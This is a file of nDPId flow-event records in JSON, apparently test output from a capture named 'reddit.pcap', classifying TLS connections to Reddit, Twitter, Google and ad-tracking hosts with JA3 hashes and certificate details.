+00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00617{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 